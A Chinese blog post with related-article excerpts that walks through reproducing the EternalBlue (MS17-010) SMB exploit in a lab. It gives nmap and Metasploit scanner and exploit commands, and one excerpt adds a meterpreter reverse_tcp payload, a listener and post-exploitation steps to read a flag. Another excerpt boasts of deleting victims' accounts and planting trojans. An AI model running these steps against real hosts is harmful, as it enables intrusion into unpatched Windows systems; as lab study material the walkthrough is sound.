永恒之蓝(MS17-010)

原创 已于 2022-12-29 08:54:14 修改 · 4k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #服务器 #linux

于 2022-12-26 22:02:36 首次发布

目录

温馨提醒:纯水文,如果不幸翻到这篇文章,可以立刻关闭!

先整理两个学习的链接(本文学习第一个):
https://blog.csdn.net/weixin_44268918/article/details/125216308
https://blog.csdn.net/weixin_46145442/article/details/107419426utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_baidulandingword~default-0-107419426-blog125216308.pc_relevant_multi_platform_whitelistv1&spm=1001.2101.3001.4242.1&utm_relevant_index=3

追溯了解(百度)

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
基于Windows网络共享协议进行攻击传播的蠕虫恶意代码

网络IP查找

ipconfig/all或者ipconfig
在这里插入图片描述

环境条件

两台主机能够互通通信,且靶机未打补丁以及开启445端口,关闭防火墙。虚拟机网络连接为桥接模式;
在这里插入图片描述
在这里插入图片描述

复现流程

没找到合适的主机,只能了解一下流程!(虚拟机下个win7就行,我当时傻…)

445端口

  1. 通过攻击机Kail的nmap进行端口扫描,通过扫描能够发现靶机的,445端口是否开启。命令为:nmap+靶机IP

使用MSF的永恒之蓝漏洞模块

1.打开MSF,命令为:msfconsole
在这里插入图片描述
2.搜索 ms17-010 代码(查找对应攻击模块),命令为:search ms17_010
在这里插入图片描述
0 exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
3 auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块。
一般先通过扫描模块对目标主机进行扫描判断是否存在漏洞,若存在漏洞再通过攻击模块进行攻击。

扫描模块

1.使用扫描模块对靶机进行扫描:命令为:use auxiliary/scanner/smb/smb_ms17_010
2.查看配置参数:命令为:set rhosts 192.168.20.10
3.执行扫描:命令为:run
通过扫描能够发现靶机可能会受到MS17-010的攻击。

攻击模块

1.使用攻击模块对靶机进行攻击:
命令为:use exploit/windows/smb/ms17_010_eternalblue
2.可以查看攻击模块能够攻击那些操作系统:
命令为:show targets
3.设置靶机或者目标IP:
命令为:set rhosts +靶机IP
执行攻击:命令为:exploit 或 run

网络攻防——永恒之蓝
weixin_46560512的博客
03-09 2万+
主要介绍永恒之蓝程序,即 windows7的SMB协议漏洞以及相关的攻击方式。
永恒之蓝ms17-0109(缓冲区溢出漏洞)
weixin_53711701的博客
12-24 1794
永恒之蓝ms17-0109(缓冲区溢出漏洞)
网络安全零基础入门】之MSF使用教程永恒之蓝漏洞扫描与利用教程,全文干货建议收藏!
最新发布
kjuhfkicf154的博客
10-16 757
Metasploit框架(Metasploit Framework, MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。Metasploit可向后端模块提供多种用来控制测试的接口(如控制台、 Web 、 CLI )。推荐使用控制台接口,通过控制台接口,你可以访问和使用所有Metasploit的插件,例如Payload、利用模块、 Post模块等。
网络安全-MS17-010漏洞-永恒之蓝
weixin_48137911的博客
02-14 4081
攻击主机上打开了目标机器的桌面,攻击成功,这个时候只要我把它原本的账户删了,不断电的情况下,我想干嘛干嘛,他就再也进不来了,除非断电,重装。这个漏洞呢,在win10是不可以的,win8也是不行滴,只有win7以及以下的电脑,才有这个漏洞,因为win7之后微软把他给修复了。账户已经建立了,试想一波,如果我是真正的入侵者,我都有你账户了,我进你系统不是轻轻松松,账户密码都是我自己设置的。.无论怎么输入都没用,因为这个账号已经被我删掉了,或者我想放什么恶意程序木马在里面,隐藏起来,他也不知道的呀~
永恒之蓝(MS17-010)
人们并不感谢罗辑
08-06 1903
SMB协议SMB是一个协议服务器信息块,它是一个客户机/服务器,请求/响应协议,通过SMB协议可以在计算机间共享文件,命名管道等资源,电脑上网上邻居就是靠SMB实现的;
ms17-010 永恒之蓝
qq_62803993的博客
01-12 5818
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
精选资源
Windows漏洞 MS17-010 / EternalBlue(永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue(永恒之蓝) 漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
精选资源
网安永恒之蓝MS17-010检测工具.zip
03-01
永恒之蓝MS17-010,漏洞检测工具
永恒之蓝MS17-010漏洞利用
qq_1873822的博客
08-20 3330
前言 永恒之蓝(Eternal Blue) 爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 SMB(全称是Server Message Block) 是一个协议服务器信息块,它是一种客户机/服
网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)
末班车的博客
03-10 1633
MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。
永恒之蓝ms-17-010
尘玥的故事
07-18 1039
2.saerch ms17-010 #命令搜索漏洞编号ms17-010相关模块。来到这个页面后的第一部是按键盘上的“i”键,左下角出现“插入”后说明操作正确。从下面的源内选择一个复制下来准备粘贴进去(都是优质源,复制哪个都可以)。尝试运行一个:screenshare—实时监控当前主机界面。换源vim /etc/apt/sources.list。-P:指定端口扫描(0-65535为全端口)使用“#”将原本的源给注释掉。-sC:使用内置脚本进行扫描。-sT:TCP全连接扫描。-sV:识别服务版本。
网络安全入门第一课—永恒之蓝ms17-010
m0_56088051的博客
07-13 7288
一、永恒之蓝(Eternal Blue)永恒之蓝相关病毒,其实是利用了微软的MS17-010漏洞。MS17-010是Windows系统一个底层服务的漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序二、实验环境。
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
记录学习
06-21 7908
msf永恒之蓝漏洞复现过程以及修复建议
永恒之蓝
m0_59598029的博客
02-27 901
永恒之蓝是指2017年4月14日晚,黑客团体(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了勒索病毒,、整个以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件2017年5月12日起,全球范围内爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,这是不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。
永恒之蓝
weixin_46809039的博客
10-25 426
永恒之蓝ms17-010ms17-010,2017年最火的漏洞,没有之一。今天重温一下。 渗透准备 win7+kali 并且确保两台主机在同一个网段。可以相互ping通。 可以互相ping通 进入msf 使用search 命令进行查找 然后使用show options查看和配置。 配置win7的 ip set rhosts /set rport set payload等内容。 然后开炮就可以了。 输入shell命令以后,自己就可以继续扩大渗透成果了。 ...
永恒之蓝(EternalBlue)
yy1024iy的博客
05-30 1758
本文介绍了永恒之蓝的基本概念和攻击方法,以及建议用户采取什么措施来防止自己受到攻击。永恒之蓝是一种利用微软Windows系统漏洞的攻击工具,被黑客广泛使用。文章描述了永恒之蓝的操作过程,并提醒读者应该定期更新操作系统和安全软件,严格保护密码等敏感信息,以避免受到网络攻击的威胁。
永恒之蓝ms17-010获取flag
07-14
### 永恒之蓝漏洞(MS17-010)利用获取Flag的步骤 永恒之蓝漏洞是一种针对Windows SMB协议的安全漏洞,攻击者可以通过该漏洞远程执行代码并获得目标系统的控制权限。以下是如何利用MS17-010漏洞并通过Metasploit框架获取Flag的详细步骤。 #### 1. 环境准备 确保目标系统存在MS17-010漏洞,并且攻击者的Kali Linux或其他支持Metasploit的系统已安装Metasploit框架。此外,需要确认目标系统的IP地址以及攻击者的监听IP和端口。 #### 2. 使用Metasploit模块 在Metasploit中,永恒之蓝漏洞的利用模块为`exploit/windows/smb/ms17_010_eternalblue`。启动Metasploit并加载该模块: ```bash msfconsole use exploit/windows/smb/ms17_010_eternalblue ``` 设置目标系统的IP地址和SMB端口(通常为445): ```bash set RHOSTS <目标IP> set RPORT 445 ``` #### 3. 配置Payload 选择一个合适的Payload,例如`windows/x64/meterpreter/reverse_tcp`,用于在成功利用漏洞后建立反向连接: ```bash set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` 设置攻击者的监听IP和端口(例如8888): ```bash set LHOST <攻击者IP> set LPORT 8888 ``` #### 4. 启动监听器 在Metasploit中启动监听器以等待目标系统的连接: ```bash use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST <攻击者IP> set LPORT 8888 run ``` #### 5. 执行漏洞利用 返回到永恒之蓝模块并执行漏洞利用: ```bash use exploit/windows/smb/ms17_010_eternalblue run ``` 如果漏洞利用成功,Metasploit将通过反向TCP连接获得目标系统的Meterpreter会话。 #### 6. 获取Flag 一旦建立Meterpreter会话,可以使用以下命令获取目标系统的权限并查找Flag文件: ```bash getuid ps migrate <进程ID> cd <目标目录> cat flag.txt ``` 通过这些步骤,攻击者可以在目标系统上找到并读取包含Flag的文件。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值